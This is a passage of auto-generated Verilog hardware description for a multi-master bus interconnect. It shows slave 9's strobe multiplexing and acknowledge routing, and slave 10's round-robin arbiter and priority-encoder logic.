    always @ (  ( ( ( s9_pri_sel == 2'd0 ) ) ? ( s9_arb_state ) : ( ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( s9_msel_arb0_state ) : ( ( ( ( s9_msel_pri_sel == 2'd1 ) ) ? ( s9_msel_sel1 ) : ( s9_msel_sel2 ) ) ) ) ) ) or  ( ( ( m0_slv_sel == 4'd9 ) ) ? ( m0_stb_i ) : ( 1'b0 ) ) or  ( ( ( m1_slv_sel == 4'd9 ) ) ? ( m1_stb_i ) : ( 1'b0 ) ) or  ( ( ( m2_slv_sel == 4'd9 ) ) ? ( m2_stb_i ) : ( 1'b0 ) ) or  ( ( ( m3_slv_sel == 4'd9 ) ) ? ( m3_stb_i ) : ( 1'b0 ) ) or  ( ( ( m4_slv_sel == 4'd9 ) ) ? ( m4_stb_i ) : ( 1'b0 ) ) or  ( ( ( m5_slv_sel == 4'd9 ) ) ? ( m5_stb_i ) : ( 1'b0 ) ) or  ( ( ( m6_slv_sel == 4'd9 ) ) ? ( m6_stb_i ) : ( 1'b0 ) ) or  ( ( ( m7_slv_sel == 4'd9 ) ) ? ( m7_stb_i ) : ( 1'b0 ) ))
    begin
        case ( ( ( ( s9_pri_sel == 2'd0 ) ) ? ( s9_arb_state ) : ( ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( s9_msel_arb0_state ) : ( ( ( ( s9_msel_pri_sel == 2'd1 ) ) ? ( s9_msel_sel1 ) : ( s9_msel_sel2 ) ) ) ) ) ) ) 
        3'd0:
        begin
            s9_wb_stb_o = ( ( ( m0_slv_sel == 4'd9 ) ) ? ( m0_stb_i ) : ( 1'b0 ) );
        end
        3'd1:
        begin
            s9_wb_stb_o = ( ( ( m1_slv_sel == 4'd9 ) ) ? ( m1_stb_i ) : ( 1'b0 ) );
        end
        3'd2:
        begin
            s9_wb_stb_o = ( ( ( m2_slv_sel == 4'd9 ) ) ? ( m2_stb_i ) : ( 1'b0 ) );
        end
        3'd3:
        begin
            s9_wb_stb_o = ( ( ( m3_slv_sel == 4'd9 ) ) ? ( m3_stb_i ) : ( 1'b0 ) );
        end
        3'd4:
        begin
            s9_wb_stb_o = ( ( ( m4_slv_sel == 4'd9 ) ) ? ( m4_stb_i ) : ( 1'b0 ) );
        end
        3'd5:
        begin
            s9_wb_stb_o = ( ( ( m5_slv_sel == 4'd9 ) ) ? ( m5_stb_i ) : ( 1'b0 ) );
        end
        3'd6:
        begin
            s9_wb_stb_o = ( ( ( m6_slv_sel == 4'd9 ) ) ? ( m6_stb_i ) : ( 1'b0 ) );
        end
        3'd7:
        begin
            s9_wb_stb_o = ( ( ( m7_slv_sel == 4'd9 ) ) ? ( m7_stb_i ) : ( 1'b0 ) );
        end
        endcase
    end
    assign s9_m0_ack_o = ( ( ( ( ( s9_pri_sel == 2'd0 ) ) ? ( s9_arb_state ) : ( ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( s9_msel_arb0_state ) : ( ( ( ( s9_msel_pri_sel == 2'd1 ) ) ? ( s9_msel_sel1 ) : ( s9_msel_sel2 ) ) ) ) ) ) == 3'd0 ) & s9_ack_i );
    assign s9_m1_ack_o = ( ( ( ( ( s9_pri_sel == 2'd0 ) ) ? ( s9_arb_state ) : ( ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( s9_msel_arb0_state ) : ( ( ( ( s9_msel_pri_sel == 2'd1 ) ) ? ( s9_msel_sel1 ) : ( s9_msel_sel2 ) ) ) ) ) ) == 3'd1 ) & s9_ack_i );
    assign s9_m2_ack_o = ( ( ( ( ( s9_pri_sel == 2'd0 ) ) ? ( s9_arb_state ) : ( ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( s9_msel_arb0_state ) : ( ( ( ( s9_msel_pri_sel == 2'd1 ) ) ? ( s9_msel_sel1 ) : ( s9_msel_sel2 ) ) ) ) ) ) == 3'd2 ) & s9_ack_i );
    assign s9_m3_ack_o = ( ( ( ( ( s9_pri_sel == 2'd0 ) ) ? ( s9_arb_state ) : ( ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( s9_msel_arb0_state ) : ( ( ( ( s9_msel_pri_sel == 2'd1 ) ) ? ( s9_msel_sel1 ) : ( s9_msel_sel2 ) ) ) ) ) ) == 3'd3 ) & s9_ack_i );
    assign s9_m4_ack_o = ( ( ( ( ( s9_pri_sel == 2'd0 ) ) ? ( s9_arb_state ) : ( ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( s9_msel_arb0_state ) : ( ( ( ( s9_msel_pri_sel == 2'd1 ) ) ? ( s9_msel_sel1 ) : ( s9_msel_sel2 ) ) ) ) ) ) == 3'd4 ) & s9_ack_i );
    assign s9_m5_ack_o = ( ( ( ( ( s9_pri_sel == 2'd0 ) ) ? ( s9_arb_state ) : ( ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( s9_msel_arb0_state ) : ( ( ( ( s9_msel_pri_sel == 2'd1 ) ) ? ( s9_msel_sel1 ) : ( s9_msel_sel2 ) ) ) ) ) ) == 3'd5 ) & s9_ack_i );
    assign s9_m6_ack_o = ( ( ( ( ( s9_pri_sel == 2'd0 ) ) ? ( s9_arb_state ) : ( ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( s9_msel_arb0_state ) : ( ( ( ( s9_msel_pri_sel == 2'd1 ) ) ? ( s9_msel_sel1 ) : ( s9_msel_sel2 ) ) ) ) ) ) == 3'd6 ) & s9_ack_i );
    assign s9_m7_ack_o = ( ( ( ( ( s9_pri_sel == 2'd0 ) ) ? ( s9_arb_state ) : ( ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( s9_msel_arb0_state ) : ( ( ( ( s9_msel_pri_sel == 2'd1 ) ) ? ( s9_msel_sel1 ) : ( s9_msel_sel2 ) ) ) ) ) ) == 3'd7 ) & s9_ack_i );
    assign s9_m0_err_o = ( ( ( ( ( s9_pri_sel == 2'd0 ) ) ? ( s9_arb_state ) : ( ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( s9_msel_arb0_state ) : ( ( ( ( s9_msel_pri_sel == 2'd1 ) ) ? ( s9_msel_sel1 ) : ( s9_msel_sel2 ) ) ) ) ) ) == 3'd0 ) & s9_err_i );
    assign s9_m1_err_o = ( ( ( ( ( s9_pri_sel == 2'd0 ) ) ? ( s9_arb_state ) : ( ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( s9_msel_arb0_state ) : ( ( ( ( s9_msel_pri_sel == 2'd1 ) ) ? ( s9_msel_sel1 ) : ( s9_msel_sel2 ) ) ) ) ) ) == 3'd1 ) & s9_err_i );
    assign s9_m2_err_o = ( ( ( ( ( s9_pri_sel == 2'd0 ) ) ? ( s9_arb_state ) : ( ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( s9_msel_arb0_state ) : ( ( ( ( s9_msel_pri_sel == 2'd1 ) ) ? ( s9_msel_sel1 ) : ( s9_msel_sel2 ) ) ) ) ) ) == 3'd2 ) & s9_err_i );
    assign s9_m3_err_o = ( ( ( ( ( s9_pri_sel == 2'd0 ) ) ? ( s9_arb_state ) : ( ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( s9_msel_arb0_state ) : ( ( ( ( s9_msel_pri_sel == 2'd1 ) ) ? ( s9_msel_sel1 ) : ( s9_msel_sel2 ) ) ) ) ) ) == 3'd3 ) & s9_err_i );
    assign s9_m4_err_o = ( ( ( ( ( s9_pri_sel == 2'd0 ) ) ? ( s9_arb_state ) : ( ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( s9_msel_arb0_state ) : ( ( ( ( s9_msel_pri_sel == 2'd1 ) ) ? ( s9_msel_sel1 ) : ( s9_msel_sel2 ) ) ) ) ) ) == 3'd4 ) & s9_err_i );
    assign s9_m5_err_o = ( ( ( ( ( s9_pri_sel == 2'd0 ) ) ? ( s9_arb_state ) : ( ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( s9_msel_arb0_state ) : ( ( ( ( s9_msel_pri_sel == 2'd1 ) ) ? ( s9_msel_sel1 ) : ( s9_msel_sel2 ) ) ) ) ) ) == 3'd5 ) & s9_err_i );
    assign s9_m6_err_o = ( ( ( ( ( s9_pri_sel == 2'd0 ) ) ? ( s9_arb_state ) : ( ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( s9_msel_arb0_state ) : ( ( ( ( s9_msel_pri_sel == 2'd1 ) ) ? ( s9_msel_sel1 ) : ( s9_msel_sel2 ) ) ) ) ) ) == 3'd6 ) & s9_err_i );
    assign s9_m7_err_o = ( ( ( ( ( s9_pri_sel == 2'd0 ) ) ? ( s9_arb_state ) : ( ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( s9_msel_arb0_state ) : ( ( ( ( s9_msel_pri_sel == 2'd1 ) ) ? ( s9_msel_sel1 ) : ( s9_msel_sel2 ) ) ) ) ) ) == 3'd7 ) & s9_err_i );
    assign s9_m0_rty_o = ( ( ( ( ( s9_pri_sel == 2'd0 ) ) ? ( s9_arb_state ) : ( ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( s9_msel_arb0_state ) : ( ( ( ( s9_msel_pri_sel == 2'd1 ) ) ? ( s9_msel_sel1 ) : ( s9_msel_sel2 ) ) ) ) ) ) == 3'd0 ) & s9_rty_i );
    assign s9_m1_rty_o = ( ( ( ( ( s9_pri_sel == 2'd0 ) ) ? ( s9_arb_state ) : ( ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( s9_msel_arb0_state ) : ( ( ( ( s9_msel_pri_sel == 2'd1 ) ) ? ( s9_msel_sel1 ) : ( s9_msel_sel2 ) ) ) ) ) ) == 3'd1 ) & s9_rty_i );
    assign s9_m2_rty_o = ( ( ( ( ( s9_pri_sel == 2'd0 ) ) ? ( s9_arb_state ) : ( ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( s9_msel_arb0_state ) : ( ( ( ( s9_msel_pri_sel == 2'd1 ) ) ? ( s9_msel_sel1 ) : ( s9_msel_sel2 ) ) ) ) ) ) == 3'd2 ) & s9_rty_i );
    assign s9_m3_rty_o = ( ( ( ( ( s9_pri_sel == 2'd0 ) ) ? ( s9_arb_state ) : ( ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( s9_msel_arb0_state ) : ( ( ( ( s9_msel_pri_sel == 2'd1 ) ) ? ( s9_msel_sel1 ) : ( s9_msel_sel2 ) ) ) ) ) ) == 3'd3 ) & s9_rty_i );
    assign s9_m4_rty_o = ( ( ( ( ( s9_pri_sel == 2'd0 ) ) ? ( s9_arb_state ) : ( ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( s9_msel_arb0_state ) : ( ( ( ( s9_msel_pri_sel == 2'd1 ) ) ? ( s9_msel_sel1 ) : ( s9_msel_sel2 ) ) ) ) ) ) == 3'd4 ) & s9_rty_i );
    assign s9_m5_rty_o = ( ( ( ( ( s9_pri_sel == 2'd0 ) ) ? ( s9_arb_state ) : ( ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( s9_msel_arb0_state ) : ( ( ( ( s9_msel_pri_sel == 2'd1 ) ) ? ( s9_msel_sel1 ) : ( s9_msel_sel2 ) ) ) ) ) ) == 3'd5 ) & s9_rty_i );
    assign s9_m6_rty_o = ( ( ( ( ( s9_pri_sel == 2'd0 ) ) ? ( s9_arb_state ) : ( ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( s9_msel_arb0_state ) : ( ( ( ( s9_msel_pri_sel == 2'd1 ) ) ? ( s9_msel_sel1 ) : ( s9_msel_sel2 ) ) ) ) ) ) == 3'd6 ) & s9_rty_i );
    assign s9_m7_rty_o = ( ( ( ( ( s9_pri_sel == 2'd0 ) ) ? ( s9_arb_state ) : ( ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( s9_msel_arb0_state ) : ( ( ( ( s9_msel_pri_sel == 2'd1 ) ) ? ( s9_msel_sel1 ) : ( s9_msel_sel2 ) ) ) ) ) ) == 3'd7 ) & s9_rty_i );
    assign s10_wb_data_i = s10_data_i;
    assign s10_data_o = s10_wb_data_o;
    assign s10_addr_o = s10_wb_addr_o;
    assign s10_sel_o = s10_wb_sel_o;
    assign s10_we_o = s10_wb_we_o;
    assign s10_cyc_o = s10_wb_cyc_o;
    assign s10_stb_o = s10_wb_stb_o;
    assign s10_wb_ack_i = s10_ack_i;
    assign s10_wb_err_i = s10_err_i;
    assign s10_wb_rty_i = s10_rty_i;
    always @ (  posedge clk_i)
    begin
        s10_next <=  ~( s10_wb_cyc_o);
    end
    assign s10_arb_req = { m7_s10_cyc_o, m6_s10_cyc_o, m5_s10_cyc_o, m4_s10_cyc_o, m3_s10_cyc_o, m2_s10_cyc_o, m1_s10_cyc_o, m0_s10_cyc_o };
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            s10_arb_state <= s10_arb_grant0;
        end
        else
        begin 
            s10_arb_state <= s10_arb_next_state;
        end
    end
    always @ (  s10_arb_state or  { m7_s10_cyc_o, m6_s10_cyc_o, m5_s10_cyc_o, m4_s10_cyc_o, m3_s10_cyc_o, m2_s10_cyc_o, m1_s10_cyc_o, m0_s10_cyc_o } or  1'b0)
    begin
        s10_arb_next_state = s10_arb_state;
        case ( s10_arb_state ) 
        s10_arb_grant0:
        begin
            if (  !( s10_arb_req[0]) | 1'b0 ) 
            begin
                if ( s10_arb_req[1] ) 
                begin
                    s10_arb_next_state = s10_arb_grant1;
                end
                else
                begin 
                    if ( s10_arb_req[2] ) 
                    begin
                        s10_arb_next_state = s10_arb_grant2;
                    end
                    else
                    begin 
                        if ( s10_arb_req[3] ) 
                        begin
                            s10_arb_next_state = s10_arb_grant3;
                        end
                        else
                        begin 
                            if ( s10_arb_req[4] ) 
                            begin
                                s10_arb_next_state = s10_arb_grant4;
                            end
                            else
                            begin 
                                if ( s10_arb_req[5] ) 
                                begin
                                    s10_arb_next_state = s10_arb_grant5;
                                end
                                else
                                begin 
                                    if ( s10_arb_req[6] ) 
                                    begin
                                        s10_arb_next_state = s10_arb_grant6;
                                    end
                                    else
                                    begin 
                                        if ( s10_arb_req[7] ) 
                                        begin
                                            s10_arb_next_state = s10_arb_grant7;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s10_arb_grant1:
        begin
            if (  !( s10_arb_req[1]) | 1'b0 ) 
            begin
                if ( s10_arb_req[2] ) 
                begin
                    s10_arb_next_state = s10_arb_grant2;
                end
                else
                begin 
                    if ( s10_arb_req[3] ) 
                    begin
                        s10_arb_next_state = s10_arb_grant3;
                    end
                    else
                    begin 
                        if ( s10_arb_req[4] ) 
                        begin
                            s10_arb_next_state = s10_arb_grant4;
                        end
                        else
                        begin 
                            if ( s10_arb_req[5] ) 
                            begin
                                s10_arb_next_state = s10_arb_grant5;
                            end
                            else
                            begin 
                                if ( s10_arb_req[6] ) 
                                begin
                                    s10_arb_next_state = s10_arb_grant6;
                                end
                                else
                                begin 
                                    if ( s10_arb_req[7] ) 
                                    begin
                                        s10_arb_next_state = s10_arb_grant7;
                                    end
                                    else
                                    begin 
                                        if ( s10_arb_req[0] ) 
                                        begin
                                            s10_arb_next_state = s10_arb_grant0;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s10_arb_grant2:
        begin
            if (  !( s10_arb_req[2]) | 1'b0 ) 
            begin
                if ( s10_arb_req[3] ) 
                begin
                    s10_arb_next_state = s10_arb_grant3;
                end
                else
                begin 
                    if ( s10_arb_req[4] ) 
                    begin
                        s10_arb_next_state = s10_arb_grant4;
                    end
                    else
                    begin 
                        if ( s10_arb_req[5] ) 
                        begin
                            s10_arb_next_state = s10_arb_grant5;
                        end
                        else
                        begin 
                            if ( s10_arb_req[6] ) 
                            begin
                                s10_arb_next_state = s10_arb_grant6;
                            end
                            else
                            begin 
                                if ( s10_arb_req[7] ) 
                                begin
                                    s10_arb_next_state = s10_arb_grant7;
                                end
                                else
                                begin 
                                    if ( s10_arb_req[0] ) 
                                    begin
                                        s10_arb_next_state = s10_arb_grant0;
                                    end
                                    else
                                    begin 
                                        if ( s10_arb_req[1] ) 
                                        begin
                                            s10_arb_next_state = s10_arb_grant1;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s10_arb_grant3:
        begin
            if (  !( s10_arb_req[3]) | 1'b0 ) 
            begin
                if ( s10_arb_req[4] ) 
                begin
                    s10_arb_next_state = s10_arb_grant4;
                end
                else
                begin 
                    if ( s10_arb_req[5] ) 
                    begin
                        s10_arb_next_state = s10_arb_grant5;
                    end
                    else
                    begin 
                        if ( s10_arb_req[6] ) 
                        begin
                            s10_arb_next_state = s10_arb_grant6;
                        end
                        else
                        begin 
                            if ( s10_arb_req[7] ) 
                            begin
                                s10_arb_next_state = s10_arb_grant7;
                            end
                            else
                            begin 
                                if ( s10_arb_req[0] ) 
                                begin
                                    s10_arb_next_state = s10_arb_grant0;
                                end
                                else
                                begin 
                                    if ( s10_arb_req[1] ) 
                                    begin
                                        s10_arb_next_state = s10_arb_grant1;
                                    end
                                    else
                                    begin 
                                        if ( s10_arb_req[2] ) 
                                        begin
                                            s10_arb_next_state = s10_arb_grant2;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s10_arb_grant4:
        begin
            if (  !( s10_arb_req[4]) | 1'b0 ) 
            begin
                if ( s10_arb_req[5] ) 
                begin
                    s10_arb_next_state = s10_arb_grant5;
                end
                else
                begin 
                    if ( s10_arb_req[6] ) 
                    begin
                        s10_arb_next_state = s10_arb_grant6;
                    end
                    else
                    begin 
                        if ( s10_arb_req[7] ) 
                        begin
                            s10_arb_next_state = s10_arb_grant7;
                        end
                        else
                        begin 
                            if ( s10_arb_req[0] ) 
                            begin
                                s10_arb_next_state = s10_arb_grant0;
                            end
                            else
                            begin 
                                if ( s10_arb_req[1] ) 
                                begin
                                    s10_arb_next_state = s10_arb_grant1;
                                end
                                else
                                begin 
                                    if ( s10_arb_req[2] ) 
                                    begin
                                        s10_arb_next_state = s10_arb_grant2;
                                    end
                                    else
                                    begin 
                                        if ( s10_arb_req[3] ) 
                                        begin
                                            s10_arb_next_state = s10_arb_grant3;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s10_arb_grant5:
        begin
            if (  !( s10_arb_req[5]) | 1'b0 ) 
            begin
                if ( s10_arb_req[6] ) 
                begin
                    s10_arb_next_state = s10_arb_grant6;
                end
                else
                begin 
                    if ( s10_arb_req[7] ) 
                    begin
                        s10_arb_next_state = s10_arb_grant7;
                    end
                    else
                    begin 
                        if ( s10_arb_req[0] ) 
                        begin
                            s10_arb_next_state = s10_arb_grant0;
                        end
                        else
                        begin 
                            if ( s10_arb_req[1] ) 
                            begin
                                s10_arb_next_state = s10_arb_grant1;
                            end
                            else
                            begin 
                                if ( s10_arb_req[2] ) 
                                begin
                                    s10_arb_next_state = s10_arb_grant2;
                                end
                                else
                                begin 
                                    if ( s10_arb_req[3] ) 
                                    begin
                                        s10_arb_next_state = s10_arb_grant3;
                                    end
                                    else
                                    begin 
                                        if ( s10_arb_req[4] ) 
                                        begin
                                            s10_arb_next_state = s10_arb_grant4;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s10_arb_grant6:
        begin
            if (  !( s10_arb_req[6]) | 1'b0 ) 
            begin
                if ( s10_arb_req[7] ) 
                begin
                    s10_arb_next_state = s10_arb_grant7;
                end
                else
                begin 
                    if ( s10_arb_req[0] ) 
                    begin
                        s10_arb_next_state = s10_arb_grant0;
                    end
                    else
                    begin 
                        if ( s10_arb_req[1] ) 
                        begin
                            s10_arb_next_state = s10_arb_grant1;
                        end
                        else
                        begin 
                            if ( s10_arb_req[2] ) 
                            begin
                                s10_arb_next_state = s10_arb_grant2;
                            end
                            else
                            begin 
                                if ( s10_arb_req[3] ) 
                                begin
                                    s10_arb_next_state = s10_arb_grant3;
                                end
                                else
                                begin 
                                    if ( s10_arb_req[4] ) 
                                    begin
                                        s10_arb_next_state = s10_arb_grant4;
                                    end
                                    else
                                    begin 
                                        if ( s10_arb_req[5] ) 
                                        begin
                                            s10_arb_next_state = s10_arb_grant5;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s10_arb_grant7:
        begin
            if (  !( s10_arb_req[7]) | 1'b0 ) 
            begin
                if ( s10_arb_req[0] ) 
                begin
                    s10_arb_next_state = s10_arb_grant0;
                end
                else
                begin 
                    if ( s10_arb_req[1] ) 
                    begin
                        s10_arb_next_state = s10_arb_grant1;
                    end
                    else
                    begin 
                        if ( s10_arb_req[2] ) 
                        begin
                            s10_arb_next_state = s10_arb_grant2;
                        end
                        else
                        begin 
                            if ( s10_arb_req[3] ) 
                            begin
                                s10_arb_next_state = s10_arb_grant3;
                            end
                            else
                            begin 
                                if ( s10_arb_req[4] ) 
                                begin
                                    s10_arb_next_state = s10_arb_grant4;
                                end
                                else
                                begin 
                                    if ( s10_arb_req[5] ) 
                                    begin
                                        s10_arb_next_state = s10_arb_grant5;
                                    end
                                    else
                                    begin 
                                        if ( s10_arb_req[6] ) 
                                        begin
                                            s10_arb_next_state = s10_arb_grant6;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        endcase
    end
    assign s10_msel_req = { m7_s10_cyc_o, m6_s10_cyc_o, m5_s10_cyc_o, m4_s10_cyc_o, m3_s10_cyc_o, m2_s10_cyc_o, m1_s10_cyc_o, m0_s10_cyc_o };
    assign s10_msel_pri_enc_valid = { m7_s10_cyc_o, m6_s10_cyc_o, m5_s10_cyc_o, m4_s10_cyc_o, m3_s10_cyc_o, m2_s10_cyc_o, m1_s10_cyc_o, m0_s10_cyc_o };
    always @ (  s10_msel_pri_enc_valid[0] or  { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[1] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[0] ) ) })
    begin
        if (  !( s10_msel_pri_enc_valid[0]) ) 
        begin
            s10_msel_pri_enc_pd0_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[1] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[0] ) ) } == 2'h0 ) 
            begin
                s10_msel_pri_enc_pd0_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[1] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[0] ) ) } == 2'h1 ) 
                begin
                    s10_msel_pri_enc_pd0_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[1] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[0] ) ) } == 2'h2 ) 
                    begin
                        s10_msel_pri_enc_pd0_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s10_msel_pri_enc_pd0_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s10_msel_pri_enc_valid[0] or  { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[1] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[0] ) ) })
    begin
        if (  !( s10_msel_pri_enc_valid[0]) ) 
        begin
            s10_msel_pri_enc_pd0_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[1] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[0] ) ) } == 2'h0 ) 
            begin
                s10_msel_pri_enc_pd0_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s10_msel_pri_enc_pd0_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s10_msel_pri_enc_valid[1] or  { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[3] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[2] ) ) })
    begin
        if (  !( s10_msel_pri_enc_valid[1]) ) 
        begin
            s10_msel_pri_enc_pd1_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[3] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[2] ) ) } == 2'h0 ) 
            begin
                s10_msel_pri_enc_pd1_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[3] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[2] ) ) } == 2'h1 ) 
                begin
                    s10_msel_pri_enc_pd1_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[3] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[2] ) ) } == 2'h2 ) 
                    begin
                        s10_msel_pri_enc_pd1_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s10_msel_pri_enc_pd1_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s10_msel_pri_enc_valid[1] or  { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[3] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[2] ) ) })
    begin
        if (  !( s10_msel_pri_enc_valid[1]) ) 
        begin
            s10_msel_pri_enc_pd1_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[3] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[2] ) ) } == 2'h0 ) 
            begin
                s10_msel_pri_enc_pd1_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s10_msel_pri_enc_pd1_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s10_msel_pri_enc_valid[2] or  { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[5] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[4] ) ) })
    begin
        if (  !( s10_msel_pri_enc_valid[2]) ) 
        begin
            s10_msel_pri_enc_pd2_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[5] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[4] ) ) } == 2'h0 ) 
            begin
                s10_msel_pri_enc_pd2_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[5] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[4] ) ) } == 2'h1 ) 
                begin
                    s10_msel_pri_enc_pd2_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[5] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[4] ) ) } == 2'h2 ) 
                    begin
                        s10_msel_pri_enc_pd2_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s10_msel_pri_enc_pd2_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s10_msel_pri_enc_valid[2] or  { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[5] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[4] ) ) })
    begin
        if (  !( s10_msel_pri_enc_valid[2]) ) 
        begin
            s10_msel_pri_enc_pd2_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[5] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[4] ) ) } == 2'h0 ) 
            begin
                s10_msel_pri_enc_pd2_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s10_msel_pri_enc_pd2_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s10_msel_pri_enc_valid[3] or  { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[7] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[6] ) ) })
    begin
        if (  !( s10_msel_pri_enc_valid[3]) ) 
        begin
            s10_msel_pri_enc_pd3_pri_out_d1 = 4'b0001;
        end
        else
        begin 
